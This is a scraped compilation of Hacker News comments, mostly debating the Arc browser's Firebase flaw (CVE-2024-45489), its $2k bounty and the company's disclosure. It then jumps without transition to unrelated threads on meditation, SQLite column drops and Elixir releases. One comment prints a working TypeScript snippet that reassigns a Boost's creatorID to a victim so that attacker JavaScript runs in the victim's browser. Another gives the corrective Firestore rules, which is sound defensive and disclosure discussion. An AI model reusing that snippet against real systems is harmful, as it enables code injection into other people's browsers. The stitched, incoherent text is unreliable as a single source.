I’m Hursh, cofounder and CTO of The Browser Company (the company that makes Arc). Even though no users were affected and we patched it right away, the hypothetical depth of this vulnerability is unacceptable. We’ve written up some technical details and how we’ll improve in the future (including moving off Firebase and setting up a proper bug bounty program) here: https://arc.net/blog/CVE-2024-45489-incident-response.
I'm really sorry about this, both the vuln itself and the delayed comms around it, and really appreciate all the feedback here – everything from disappointment to outrage to encouragement. It holds us accountable to do better, and makes sure we prioritize this moving forward. Thank you so much.
Was the post written for HN users only? I cannot see it on your blog page (https://arc.net/blog). It’s not posted on your twitter either. Your whole handling seems to be responding only if there is enough noise about it.
Hursh, can you please respond to the above commenter? As an early adopter, I find it fairly troubling to see a company that touts transparency hide the blog post and only publicly "own up to it" within the confines of a single HN thread.
Security bulletin is posted up top on the blog page now, but I have to say it doesn't exactly give me a warm and fuzzy feeling.
It falls a bit flat for me where you address the tracking of domains visited by users; I don't think it accurately addresses or identifies the core issue. When you say "this is against our privacy policy and should have never been in the product to begin with"--okay, so how did it get there? This wasn't a data leak due to a bug; it was an intentionally designed feature that made its way through whatever review process might be in place and into production without being challenged. What processes will you put in place to prevent future hidden violations of your stated policies?
Edit just to say, dubious as I am, I sincerely hope Arc can overcome these issues and succeed. We desperately need more browsers, badly enough that I'll even settle for a Chromium-based one as long as it isn't made by Microsoft.
Right now you and Arc are advertising that posts such as "Hidden Features in Arc Search" deserve prime placement for users, while security bulletins and remediations are something that needs a hidden stopgap until you've scrambled to build an alternative site to tuck them away on instead.
Browser security is more than finding the best PR strategy, it's a mindset that prioritizes the user's well being over the product's image. I've deleted my account and uninstalled Arc. Not because of the issue in itself, but because it's clear what the response has been aiming to protect (not my data).
The sibling comment to this by sieabahlpark is already dead, but to respond in case they get a chance to read the thread again anyway:
The engineers already closed the hole, the blog post was already published, and more work was (/is still?) going to be done to make a new site to hide them in. I wasn't asking for them to move engineers off patching and onto blog posting; I was asking for the already-written blog post to be made as visible on the blog as the other posts (which is now the case, so at least there is that).
Regarding whether or not they did analysis to show it wasn't exploited: that was indeed nice to see, but you still have to make the post visible anyway, because you're not always right, even if you're one of the biggest companies in the world: https://www.theregister.com/2024/09/17/microsoft_zero_day_sp... The measure to meet here is transparency, not perfection.
And no, I wasn't really sitting around waiting for a good opportunity to delete my account and uninstall my main browser. That would be... very odd? I'm free to change browsers without a reason to blame, haha. I didn't say what I was switching to either (it's quite irrelevant to the topic), and it could certainly be something other than the two options you have quips for. Regardless of which option, the measure to meet here is again not perfection but transparency, and yes, others meet that well above how Arc did in this case.
More than anything, the reason for responding is less to argue about most of those points (I even debated just removing them, as they may detract from the point) and more to point out that "real" transparency on security incidents (not just whatever a PR person would say gives the best image) is as big a factor in trusting a company with your data as their actual response to vulnerabilities. It doesn't matter that a company looks great 100% of the time they tell you about things if you know they are being intentionally stingy about what they show you, since you then have no way to trust they'd show you the bad anyway.
(repeat of the above response type. Sorry if this breaks a rule or something Dang, but it's a pretty tame/decent conversation)
This is still responding to a different complaint. The operational performance of "optimally distributing" the message, or however you want to word it, was/is both imperfect and perfectly fine at the same time. Where the ball was dropped was in responding to a complaint about the post being specially hidden by describing how it will be shown on a different site in the future, instead of acknowledging it should be visible as a normal post right now.
When the alarms are going off you're going to be slow, you're going to make the wrong decision on something minor, you're going to wish, looking back, that you had done x by y point in time; you're going to have been imperfect. All that kind of stuff was handled fine (from what I can tell) here. The disappointment in transparency was in deflecting a pointed-out fix for the visibility issue instead of outright acknowledging it was a miss.
My message was/is about how that's not cool. Not that their handling of the issue itself was bad, or an expectation of an apology, or an expectation that more resources should have been put on doing x, y, or z. Just that deflecting callouts on security communication issues with deferrals and redirection is not a cool way to handle security communication. They've since changed it, which is cool of them, but the damage was done with me (and maybe some others) in the meantime. Maybe in the future they handle that differently, maybe they don't, but for now I lost the trust I had that they always will, even when nobody is looking, since they didn't even when they knew people were.
Every comment I make is immediately dead upon me posting, it's been that way for about a year.
I believe transparency is necessary, but also have been in the situation where the alarms are going off and you slip on making sure disclosures are optimally distributed. Generally I'm just concerned that it's documented at all.
Now if they maintained not revealing the security issue over the following week I'd agree.
Should they have had a bulletin stating when it occurred in August? Absolutely. I'm not disagreeing, and with more distance from that event I would agree with you. However, considering just how fundamental the security vulnerability was, there isn't exactly an immediate benefit to blasting it to the world. It opens up the spotlight for more advanced attackers to take advantage of other unpatched holes.
Taking the time to go through and _really_ make sure it's patched (as well as a general check around the codebase for other EZ vulns) is, in my opinion, the better option.
Now if this had been a larger timeframe and a repeated offense, I'd agree that security hygiene for Arc should be bumped up in priority ASAP, and that until that happens Arc as a platform probably could not be trusted.
Not a good look it not being on the main page! I personally use [zen browser](https://github.com/zen-browser/desktop); I like the ideas of Arc, but it always seemed sketchy to me, especially it being Chromium-based and closed-source.
I used Arc for a while because, despite my misgivings about using a browser that requires an account etc., the workflow was very good for me.
I started moving to Zen about a week ago; hearing about this vulnerability yesterday, and especially seeing their reaction to it, I know I made the right choice in leaving Arc.
Hell, despite missing tab groups, Zen browser is the only browser that finally had a "good enough" vertical-tabs implementation, which allowed me to finally drop Edge as my main browser.
Hi Hursh, I'm Tom. A couple friends use Arc and they like it, so I had considered switching to it myself. Now, I won't, not really because of this vulnerability itself (startups make mistakes), but because you paid a measly $2k bounty for a bug that owns, in a dangerous way, all of your users. I won't use a browser made by a vendor who takes the security of their users this unseriously.
By the way, I don't know for sure, but given the severity I suspect on the black market this bug would have gone for a _lot_ more than $2k.
Selling a vulnerability on the black market is immoral and may be illegal. The goal of bug bounty programs was initially to signal "we won't sue white-hat researchers who disclose their findings to us"; when did it evolve into "pay me more than criminals would, or else"?
Let's set aside morality for a second. There is a reason low payouts are bad without even having to consider the black market: it pushes people to search for bugs in a competitor's app that pays more instead of in your app!
If your app is paying out $2K and a competing app pays out $100K, why would anyone bother searching for bugs in your app? Every minute spent researching your app pays 1/50th of what you'd get searching the competing app (unless your app has 50x more bugs, I suppose, but then perhaps you have bigger problems...).
I'm always so confused by the negative responses to people asking for higher bug bounties. It feels like it still comes from this weird entitlement that researchers owe you the bug report. Perhaps they do. But you know what they definitely don't owe you? Looking for new bugs! Ultimately this attitude always leads to the same place: the places that pay more protect their users better. It is thus completely reasonable for a user to decide not to use a product if the company that makes it isn't paying high bug bounties. It's the same as discovering that a restaurant is cheaping out on health inspections and deciding to no longer eat there.
Bug bounties are always in relation to severity, number of users potentially at risk, and market cap. A browser operating at a deficit from a small company with a small market share cannot pay 100k even if they wanted to.
If you and a couple friends released an app that had 50k users and you’d not even broken even, can I claim my 100k by finding a critical RCE?
No, because you probably haven't bothered to find said RCE. There's a strange refusal to understand the simplest market considerations here. I understand it sucks and you may not be able to afford it, but the consequence, regardless of all the reasons you can give, is that you will get less of the right kind of attention (security researchers). Now, you can hope that you will also get less of the wrong kind of attention, and if you're lucky all of these will scale together. Or, alternatively, you can for example not start by introducing features like Boosts that have a higher probability of adding security vulnerabilities, counteracting the initial benefit of riding on Chrome's security by using the same engine. Browsers are particularly sensitive products. It's a tough space because you're asking users to live their lives in there. In theory, using Chromium as a base should be a good hack to be able to do this while plausibly offering comparable security to the well-established players.
Long story short, there are ways to creatively solve this problem, or avoid it, but simply exclaiming “well it would be too hard to do the necessary thing” is probably not a good solution.
lol, that’s not how this works, that’s not how any of this works…
you cannot demand more than someone is willing or able to pay. either a researcher out there will spend some time on it because it's a relatively new contender in the market and they're hoping for low-hanging fruit, or they won't.
obviously the bounty was enough for someone to look at it and get paid out for a find, otherwise we wouldn't be having this conversation. trying to argue that they should set a bounty high enough to make it worth your time is pointless and a funny stance to take. feel free to ignore it or be upset that they aren't offering enough to make you feel secure; it's not going to make 100k appear out of thin air.
I'm not a security researcher, so it's really not about me. You seem to be confused about what we're even arguing about: this discussion started because someone said they wouldn't use this browser because the low bug bounty amount shows that the company isn't taking security seriously. My posts simply defend why this is a perfectly reasonable stance to take; they are not me demanding an increase in bug bounties so that I will work on them. A good trick if you're ever confused about a discussion is to simply scroll up and read the posts. I'll make it even easier for you, this is where it starts: https://news.ycombinator.com/item?id=41606272
Secondly, in a true demonstration of confusion, if you read my posts they demand nothing. They simply state the likely outcomes of certain choices. I'm not sure how to possibly make the stance of "if you pay smaller bug bounties in a market that has other offerings, you will get less research focused on your product" any simpler. It seems fairly straightforward... and the existence of one bug report does not somehow "disprove" this. Why not make the bug bounty $1 otherwise? Oh, is that a ridiculous suggestion? Because that might not be a worthwhile enough incentive, perhaps? But who are you to dictate what is and isn't a worthwhile incentive? "That's not how this works. That's not how any of this works..."
> “either a researcher out there will spend some time on it […] or they won’t.”
Yes, I agree with this truism that they either will spend time on it or they won't. Interestingly, this is true in all scenarios. My point is about how to optimize for researchers spending time on your product (which in theory you are inclined to do if you are offering a bounty), and I then separately even make suggestions for how to possibly require less attention, by making safer choices and being able to "ride" on another project's bug bounties.
But again, the simplest point here is that the position of “we offer low bug bounties because that is what we can afford” is fine, it’s just also absolutely defensible to be completely turned off by it as a potential user of that product, for the likely security implications of that position.
Put it this way: if someone got hold of the vuln and exploited all the users, and they all sued you, how much would it cost to defend yourself in court (not even considering winning or losing)?
Right, part of the idea is to close the gap in incentives for white hats looking for vulnerabilities to report and black hats looking for the same to exploit. You don't have to beat the black market price of a vuln because that route is much riskier, but somewhere at least in the same order of magnitude sounds decent.
It's not about viewing security researchers as sociopaths who will always sell to the highest bidder. The fact is there will always be criminals going for exploits, and bug bounties can help not just by paying off someone who would have otherwise abused a bug, but also by attracting an equally motivated team, who would otherwise be entirely uninvolved, to play defense.
> because you paid a measly $2k bounty for a bug that owns, in a dangerous way, all of your users
The case is redeemable. It may still be an opportunity if handled deftly. But it would require an almost theatrical display of generosity to the white hat (together, likely, with a reconstituting of the engineering team).
After thinking about it for a good long ten seconds: yeah. It would be very easy to steal users' banking information with this. If you crack into one single bank account you have a decent shot at making over $2k right there; a skilled hacker could do a lot more.
Comments further down are concerned that on each page load, you're sending both the URL and a(n identifiable?) user ID to TBC. You may want to comment on that, since I think it's reasonable to say that those of us using not-Chrome (I don't use Arc personally, but I'm definitely in the 1% of browser users) are likely to also be the sort of person concerned with privacy. Vulnerabilities happen, but sending browsing data seems like a deliberate design choice.
I think that is addressed in the post. Apparently the URL was only sent under certain conditions and has since been addressed:
>We’ve fixed the issues with leaking your current website on navigation while you had the Boost editor open. We don’t log these requests anywhere, and if you didn’t have the Boosts editor open these requests were not made. Regardless this is against our privacy policy and should have never been in the product to begin with.
Given the context (boosts need to know the URL they apply to after all) this indeed was a "deliberate design choice" but not in the manner you appear to be suggesting. It's still very worrisome, I agree.
There isn't really anything you can do to convince me that your team has the expertise to maintain a browser after this. It doesn't matter that you have fixed it, your team is clearly not capable of writing a secure browser, now or ever.
I think this should be a resigning matter for the CTO.
And what, you’re going to find them a new CTO? What kind of magical world do you live in where problems are solved by leaders resigning, instead of stepping up and taking accountability?
CTO is simply a title; the proper response here would be to hire a head of security and build it into the culture from the ground up.
I'm looking at all of the Arc Max features which probably need to be architected correctly to be secure/privacy-preserving.
They could take a lot of inspiration from iCloud Private Relay and iOS security architectures in addition to really understanding the Chrome security model.
Because sometimes it's a deadline pushed by management, so a change could result in allowing more time for design, programming, review, or even full-time security personnel. Nobody writes the best, most secure software under a deadline.
Yeah, I also think that asking someone to resign for this does not look like a proportionate response.
Owning up to their mistakes and making sure such things don't happen again (and increasing the amount from 2K :-)) seems like the right approach to me.
Surprise surprise, turns out it takes a looong time for every software startup to finally strip out all the hacky stuff from their MVP days. Apparently nobody on this startup community forum has ever built a startup before.
Pro tip: if stuff like this violently upsets you, never be an early adopter of anything. Wait 5-10 years and then make your move.
Personally, I expect stuff like this from challenger alternatives, this is the way it should be. There is no such thing as a new, bug-free software product. Software gets good by gaining adoption and going through battle testing, it’s never the other way around like some big company worker would imagine.
I don't think you understood the severity or the noobiness of the error. This is a browser, not a CRUD app or an Electron app. A browser is a complex, system-level piece of software, not a hacky MVP, and this kind of error shows that maybe they don't have the competence to be building something like this. It makes you wonder what other basic flaws are there just waiting to be exploited, even if it's built on top of Chromium. Would you fly in an MVP airplane built by bicycle engineers? (Maybe not the best analogy, since the first airplane was built by bicycle engineers.)
Agreed, I wouldn’t have hopped on the first airplane with some bicyclist named Wilbur. That would involve risk of immediate physical harm.
On the other hand, we’re talking about a 2 year old browser leaking what websites you visit. Do you also think Firefox in 2006 was bulletproof? The entire internet and every single OS & browser was a leaky bucket back then.
The current safety-ism, paranoia and risk-aversion around consumer software on this forum is hilarious to me. Maybe they shouldn’t have called this place “Hacker” news, because it’s now full of people LARPing as international intelligence agency targets from a 90s movie. If the prying Five Eyes are such a concern for you, maybe use a fake email when signing up for stuff and your browser history is instantly anonymized.
Yes, startups involve lots of risk (to everyone involved: users/employees/founders/investors). But risk is the only way we get new things. If those risks are too scary for you, stay far away from startups.
You're speaking in bland, hand-wavy generalities, and like I said before, I'm not sure you understood the issue or even read the write-up, since you're not really addressing it specifically (it's a whole lot more than 'leaking'). To extend the analogy, this is like having bike engineers build an MVP supersonic jet and finding out they are using bike brakes to stop the thing. It's not merely an error; it's about some very questionable architecture. This is not a Mozilla innovating-the-browser, making-the-mistakes-you-get-when-experimenting-with-something-new type of situation at all, and it has nothing to do with paranoia or Five Eyes lol.
> $2,000 is a tiny fraction of what this bug is worth
The Browser Company raised $50mm at a $550mm post-money valuation in March [1]. They've raised $125mm altogether.
Unless they're absolute asshats, they'll increase the bug payout. But people show their true selves when they don't think they're being watched: a vulnerability of this magnitude was worth $2k to this company. That's... eyebrow-raising.
"We will let anyone run arbitrary JavaScript on all your web pages if you send them a referral link" is surely a 6-7 figure vulnerability for a web browser. That this vulnerability was discoverable using about two steps of analysis tools suggests many more issues are in the product.
It is very strange to me that their attitude is "no one was impacted" and this is "hypothetical". Any serious company would immediately consider this to be a case where everyone was impacted! This is like coming home to the worst neighborhood on the planet to find your door wide open, and immediately putting on a blindfold so you can continue to pretend nothing's changed.
Can you explain? How are they able to check whether someone did a quick “in and out” keylogger or cookie extraction? I doubt they can, because I doubt they store every request (that would go against what they claim for privacy) and I also doubt their DB backup happens on such a high frequency that they could catch this (e.g. minute-to-minute).
So…how? Are you claiming they have oodles of logs and a perfect dork* to find suspicious JavaScript? If they had the latter wouldn’t they already be using it for security?
I don't think you're using "dorking" correctly here, since web crawlers aren't anywhere in the picture. Server log queries aren't "dorks." Besides, if you can reproduce the issue and _if_ it's somehow logged in the database, it's usually not too hard to figure out how to query for other occurrences.
With that said, I think you're probably right. I doubt Firebase audit logs contain update contents, and based on the bug report, your "in and out" proposal is as simple as:
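Roughly, and purely as an illustrative sketch of what the write-up describes (Firebase v9 web SDK; the "boosts" collection and creatorID field come from the disclosure, while the account and IDs are placeholders):

import { initializeApp } from "firebase/app";
import { getFirestore, doc, updateDoc } from "firebase/firestore";
import { getAuth, signInWithEmailAndPassword } from "firebase/auth";

// Arc's Firebase client config ships inside the app itself, so anyone can
// talk to the backend directly. Values here are placeholders.
const app = initializeApp({ apiKey: "<public-api-key>", projectId: "<project>" });
const db = getFirestore(app);

async function reassignBoost(boostId: string, victimUserId: string) {
  // Sign in as any ordinary, attacker-controlled Arc account.
  await signInWithEmailAndPassword(getAuth(app), "attacker@example.com", "hunter2");
  // Overwrite the owner of an attacker-authored Boost. The vulnerable rules
  // never checked creatorID against the caller, so the write was accepted,
  // and the victim's browser then loaded the attacker's Boost JS.
  await updateDoc(doc(db, "boosts", boostId), { creatorID: victimUserId });
}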
Most of the vulnerabilities I've disclosed, and I've seen disclosed, were disclosed for free, with no expectation of getting anything. Why do you think every researcher is an amoral penny pincher who will just sell exploits without caring for the consequences?
I know a lot of different people who do independent security research and have submitted vulns to bounty programs. Not a single one would even come close to saying "well, the bounty is low so I'll sell this on the black market."
Low bounties might mean that somebody doesn't bother to look at a product or doesn't bother to disclose beyond firing off an email or maybe even just publishes details on their blog on their own.
Bounties aren't really meant to compete with black markets. This is true even for the major tech companies that have large bounties.
Firebase is not to blame here. It's a solid technology which just has to be used properly. Google highlights the fact that setting up ACLs is critical and provides examples on how to set them up correctly.
If none of the developers who were integrating the product into Arc bothered about dealing with the ACLs, then they are either noobs or simply didn't care about security.
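For reference, the ownership check Google's docs keep pointing at is only a few lines of Firestore security rules. A rough sketch (collection and field names are assumptions, mirroring the Boost case above):

rules_version = '2';
service cloud.firestore {
  match /databases/{database}/documents {
    match /boosts/{boostId} {
      // Anyone signed in can read; only the owner can write, and
      // ownership can never be reassigned on update.
      allow read: if request.auth != null;
      allow create: if request.auth != null
                    && request.resource.data.creatorID == request.auth.uid;
      allow update: if request.auth != null
                    && resource.data.creatorID == request.auth.uid
                    && request.resource.data.creatorID == resource.data.creatorID;
      allow delete: if request.auth != null
                    && resource.data.creatorID == request.auth.uid;
    }
  }
}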
Until this individual comes back and responds to at least a few of the questions/comments, I don't think we should even pay attention to this marketing-dept-written post. They basically want this to go away, and answering any questions would most likely raise more issues, so they seem to have done the bare minimum and left it at that. It's 3 hours later now; they might as well have not even posted anything here.
50k or 100k would be far more appropriate given the severity of this issue. But overall, this makes me think there's probably a lot more vulnerabilities in Arc that are undiscovered/unpatched.
Also, there's the whole notion of every URL you visit being sent to Firebase -- were these logged? Awful for a browser.
Ya this is fair! Honestly this was our first bounty ever awarded and we could have been more thoughtful. We’re currently setting up a proper program and based on that rubric will adjust accordingly.
I think the bigger question is: why are you violating your own privacy policy by keeping track of what we browse? I thought my browsing was private and hidden away from you, but if you store my browsing data in your Firebase, that is not acceptable at all.
> "...the hypothetical depth of this vulnerability is unacceptable."
What is also unacceptable is paying 2000 dollars for something like this AND requiring user accounts to use your browser. Will definitely stay away from it.
I would like to respectfully provide the suggestion of allowing for the use of Arc without being signed into an account. Although I understand browser/device sync is part of most modern browsers, and the value it provides, normally it is a choice to use this feature. Arc still provides a lot of attractive features, even without browser sync on.
I like Arc, and I don’t want to pile on: God knows I’ve written vulnerable code.
To explore a constructive angle both for the industry generally and the Browser Company specifically: hire this clever hacker who pwned your shit in a well-remunerated and high-profile way.
The Browser Company is trying to break tradition with a lot of obsolete Web norms, so how about breaking with paying bullshit bounties under pressure, and instead posting the underground experts to guard the henhouse?
What if the Browser Company started a small but aggressive internal red team aimed at the biohazard that is the modern web?
I’ll learn some new keyboard shortcuts and I bet a lot of people will.
So when there are near weekly reports of websites being compromised due to horrid Firebase configuration, did absolutely no one on your teams raise a red flag? Is there some super low-pri ticket that says "actually make sure we use ACLs on Firebase"?
Hursh / ha470, where did you go? There are lots of good questions in the replies to your thread, yet you went dark immediately after posting more than 8 hours ago. It's hard to imagine what could be more pressing than addressing people's concerns after a major security incident such as this.
To be honest, I'm a bit disappointed. For future reference, this doesn't seem like a good strategy to contain reputational damage.
> This kind of bug could be sold for 100-200k easily
Maybe not. If the browser is that buggy, there may be plenty of these lying around. The company itself is pricing the vulnerability at $2k. That should speak volumes to their internal view of their product.
Many engineers at SV startups use Arc on a daily basis. This bug could've resulted in the compromise of multiple companies, probably including crypto exchanges. A browser bug of this severity is extremely valuable, even for a niche browser like Arc.
> Many engineers at SV startups use Arc on a daily basis
Do we have adoption statistics?
It would seem prudent for the browser to be banned in professional environments. (I use Kagi's Orion browser as a personal browser on MacOS. My work is done in Firefox.)
> browser bug of this severity is extremely valuable, even for a niche browser like Arc
Absolutely. (Even if it were in beta.)
What I'm trying to say is the $2k payout sends a message. One, that The Browser Company doesn't take security seriously. And/or two, that they don't think they could pay out a larger number given the state of their codebase.
Side note: my favourite content on crisis management is this 2-minute video by Scott Galloway [1]. (Ignore the political colour.)
There is also 3: putting a big bounty out signals to other very smart and ingenious security researchers that Arc is a lucrative opportunity to make money. Till now it's been "safe" in relative obscurity: not a lot of people focused on hacking it or gave it much effort because it wasn't worth their time.
It’s already going to be under the microscope now from black hats, so unless they want a catastrophic issue to result in user harm, they better get their act together.
I think OP meant to say "this bug could let an attacker gain $200k of value easily", though you are right that the market-clearing price for such a vulnerability is probably low due to huge supply.
The CTO and co-founder didn't check in on any of the concerns; he completely disappeared after leaving a heartfelt comment.
This comes off as incredibly disingenuous.
It's disappointing that he seems to confuse the field in which intelligence and perception take place (the subjective experience of being alive) and the sensory perception and thought inside it. It'd be a much more interesting article if he focused on how and why the former shows up out of physical neurons.
You can either get information from other people you trust who you think would give you accurate feedback, or try to develop a clearer sense of how your own mind works via ego dissolution.
For the former, it's probably ideal to pick someone you trust and respect, and try to be clear with them that you want critical or constructive feedback.
For the latter, meditation, therapy, and Vedanta-style self-inquiry can all trigger more self-awareness and self-dissolution. As the amygdala shrinks and prefrontal cortex gets more activated, the fear-based, survival-oriented self erodes and you start to be able to see more clearly and objectively.
While I love SQLite as much as the next person (and the performance and reliability is really quite remarkable), I can’t understand all the effusive praise when you can’t do basic things like dropping columns. How do people get around this? Do you just leave columns in forever? Or go through the dance of recreating tables every time you need to drop a column?
SQLite is for storing data in an environment where SQL is meaningful. Anyone wanting to do database admin tasks (like adjusting table schema) would be well advised to go with a Real Database.
SQLite really shines when you have a more-or-less final idea of what tables you want to build and don't have to worry about users inputting crazy data. Anything up to that and it is a model of simplicity. Anything beyond that and it is undercooked.
I just sucked the existing table into RAM and recreated the table. I did it in a transaction so there was no risk of data loss.
In my case the data was always 10s of MBs.
Remember, the point of SQLite is to replace generating your own file format. Although it's a database, it lets us (developers) reuse our knowledge of databases when doing basic file I/O.
When do you need to drop a column in a production DB? Maybe my anecdotal bubble is about to burst, but I've worked in the public sector for a while, and across our 200 different production DBs behind around 300 systems we've never dropped a column.
Depends on the maturity of your schema - if it's all figured out based on your business domain it won't happen much. If you're still finding product-market fit (or equivalent) splitting a table into two happens sometimes.
"Splitting" a table usually means creating two new ones and dropping the old one after migrating its content with a complex migration script followed by thorough testing. Dropping columns is not only abnormal (adding columns is far more common: features tent to be added, not removed, over time) but also a very crude tool.
Well what I meant was: when you break one table out of another. The kind of thing that comes up when you learn that there's a one-to-many in the domain that you didn't know about when you started.
There are also operational concerns here. Dropping columns may require rebuilding indices, which can have a high cost that isn't worth paying for just to keep the schema clean.
Pretty sure they must: row-based storage on disk would practically require it, just so you don't completely waste all of the space you've just gained from deleting the column by leaving a gap in every single row.
If adding a nullable column is free, it probably means that the DBMS is able to distinguish multiple layouts for the same table: existing rows in which the new column doesn't actually exist and is treated as NULL, and newly written rows in which there is space for the new column.
But dropping a column is different: even if the DBMS performs a similar smart trick (ignoring the value of the dropped column that is contained in old rows) space is still wasted, and it can only be reclaimed by rewriting old files.
Dropping a column in postgres is also instant, so yes, it uses the same trick.
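Easy to check (hypothetical table and column names): Postgres just flags the column as dropped in the pg_attribute catalog instead of rewriting the table.

-- Returns immediately even on a huge table: only the catalog is touched.
alter table big_table drop column payload;

-- The dead column lingers, flagged as dropped, until rows are rewritten:
select attname, attisdropped from pg_attribute
where attrelid = 'big_table'::regclass;

-- Space is reclaimed only by rewriting the table, e.g.:
vacuum full big_table;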
Deleting a row is similar too - the row is not removed from the heap page and the database does not get smaller (though if that page gets rewritten the row is not kept). Last time I used innodb it didn't actually return free heap pages to the filesystem at all so no matter how much you deleted the database file never got smaller.
I agree with you. SQLite drove me nuts when it came to changing your database. This is one of the reasons I just use DB Browser for SQLite (DB4S). It takes care of all the complexity.
The general strategy is to create a new table, insert the data from the old table, drop the old table, rename the new table, and re-create the indexes, all inside a transaction:
begin transaction;
create table foo2 (
  col1 int,
  col2 text
);
insert into foo2 select col1, col2 from foo;
drop table foo;
alter table foo2 rename to foo;
create index foo_col1 on foo(col1);  -- SQLite requires the index to be named
commit;
As for the reason, see the next section on that link. It's not perfect, but it is what it is. SQLite wasn't designed to solve 100% of the use cases, and that's not a bad thing.
We use sqlite as a smaller cache of a much larger postgres db. The cache is generated by a job and yes is regenerated every time before being pushed to machines that need it.
Think of SQLite as a file format which happens to have a query interface, and not a database.
MySQL did DDL for years with full table rewrites behind the scenes. It's not particularly hard to emulate, though not entirely pleasant.
(Although I really raise an eyebrow when people talk about performance. Every time I write anything server-like on SQLite I end up regretting it, and get an enormous speed boost, not to mention actual concurrency, by switching to PostgreSQL.)
For data analysis workloads I just load in my raw source data and then develop a series of scripts that create new tables or views on top of those raw inputs.
For my use cases I've thusly never had to drop/alter a column... but I understand it could be very annoying.
Yes! The first few were super tough (and not fun) but I got a lot out of them and gradually they've gotten easier, although just as productive.
So many people in the comments mentioned retreats but I'm surprised not a single person mentioned enlightenment. The whole point of retreats is to get you to a point where you willfully and intentionally seek freedom from suffering, but it seems like a ton of people get stuck in the retreat treadmill. Living a happier, more peaceful life is one thing but it's very possible to completely eradicate the subjective experience of suffering (or at least eliminate enough of it that it's largely unnoticeable). Enlightenment is very accessible and super achievable, especially now with the internet.
Sorry if this is a dumb question, but how do releases fit into the deployment story with containers so prevalent these days? (As in why is this a benefit when you can just package code into a single container to ship it?) Is it that it works with hot code updates? Or it’s a more Erlang-sanctioned way of deploying code?
Fred Hebert was on the ElixirTalk podcast and mentioned speed of deploys as one advantage - no need to rebuild a bunch of VMs.
> From experience, we could deploy to a 70-node cluster in something like under 5 seconds by doing it in parallel. If you want to rotate your infrastructure... your deploy could be taking from 5 minutes to an hour depending on how fast the connection draining can be done.
There's a good 'why releases' section of the article.
Even without the compilation and configuration stuff, it's easier to put the release bundle in something basic like an alpine image than to keep Docker image versions and the app in sync.
But the article says you have to run the release on the same OS/version that you built it on. So if you're running it on alpine, won't you need to build it on alpine, which suggests you'll need to configure your Dockerfile to compile it anyway?
You would have two images, one with all compile time dependencies, sources, etc, which you use to assemble the release, and another image with only the artifact (the release) and none of the rest. Hex (Elixir's package manager) is open source and uses this approach, which you can see here: https://github.com/hexpm/hexpm/blob/d015973e472af59644ee537f...
That is correct. But that can be multiple stages, and therefore separated concerns.
Also, releases can be very small, after all the superfluous parts/symbols are stripped. Combine that with a fresh alpine image and you have quick-to-deploy containers.
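As a concrete sketch of that two-stage approach (assuming Elixir 1.9+ built-in mix release and a hypothetical app named myapp; the Distillery equivalent looks much the same):

# Stage 1: build the release with all compile-time dependencies.
FROM elixir:1.9-alpine AS build
RUN apk add --no-cache build-base git
WORKDIR /app
ENV MIX_ENV=prod
RUN mix local.hex --force && mix local.rebar --force
COPY mix.exs mix.lock ./
RUN mix deps.get --only prod && mix deps.compile
COPY . .
RUN mix release

# Stage 2: a fresh alpine image containing only the release artifact.
# ERTS was compiled on alpine in stage 1, so the same-OS requirement
# mentioned above is satisfied.
FROM alpine:3.10
RUN apk add --no-cache openssl ncurses-libs
WORKDIR /app
COPY --from=build /app/_build/prod/rel/myapp ./
CMD ["bin/myapp", "start"]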
With Distillery you can specify a directory for the ERTS so the release can be built on one OS and run on another. You just have to make sure ERTS was built on the OS that it will eventually run on.
Building a container and building a release are quite similar in many respects, so if all you want is to compile your Elixir app during a container build, a release might not give you very much. An Erlang/Elixir release has some goodies that you might be interested in, so I'd read up on those goodies to see if they are attractive to you.
Ideally you (and everyone else) should be rewarded for business impact, which can come from communication, code quality, velocity, and any number of other things.